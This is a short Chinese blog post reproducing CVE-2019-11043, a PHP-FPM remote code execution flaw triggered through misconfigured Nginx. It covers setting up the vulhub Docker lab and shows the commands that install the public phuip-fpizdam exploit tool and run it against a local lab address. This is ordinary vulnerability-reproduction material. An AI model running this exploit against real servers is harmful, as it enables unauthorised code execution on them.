CVE-2019-11043 PHP-FPM执行任意代码
0x00背景
在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。
在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。
0x01环境搭建
下载漏洞环境,使用docker搭建,漏洞环境地址https://github.com/vulhub/vulhub/blob/master/php/CVE-2019-11043,进入漏洞环境目录,执行docker-compose up -d命令,进行安装。
漏洞环境搭建成功,如图
0x02漏洞利用
在kali上配置好go环境,然后执行下面命令
go get github.com/neex/phuip-fpizdam
go install github.com/neex/phuip-fpizdam
./phuip-fpizdam http://192.168.175.135:8080/index.php
0x03参考链接
https://github.com/neex/phuip-fpizdam
https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注网络尖刀微信公众号
随时掌握互联网精彩
随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 习近平向越南新任国家主席致贺电 4971250
- 2 东部战区位台岛周边开展演习 4983056
- 3 教授建议18到25岁要多谈恋爱 4827185
- 4 定格生物多样性之美 4738711
- 5 专家回应不少大人孩子近来嗓子疼 4610762
- 6 秦皇岛:近期不要食用海虹等贝类 4585237
- 7 山西女教师被杀案嫌疑人系其丈夫 4496094
- 8 恒大汽车被要求退回奖励补贴19亿 4380519
- 9 警方辟谣摊贩跳河城管跑了 4216208
- 10 女子带婴儿到网吧打游戏 4124182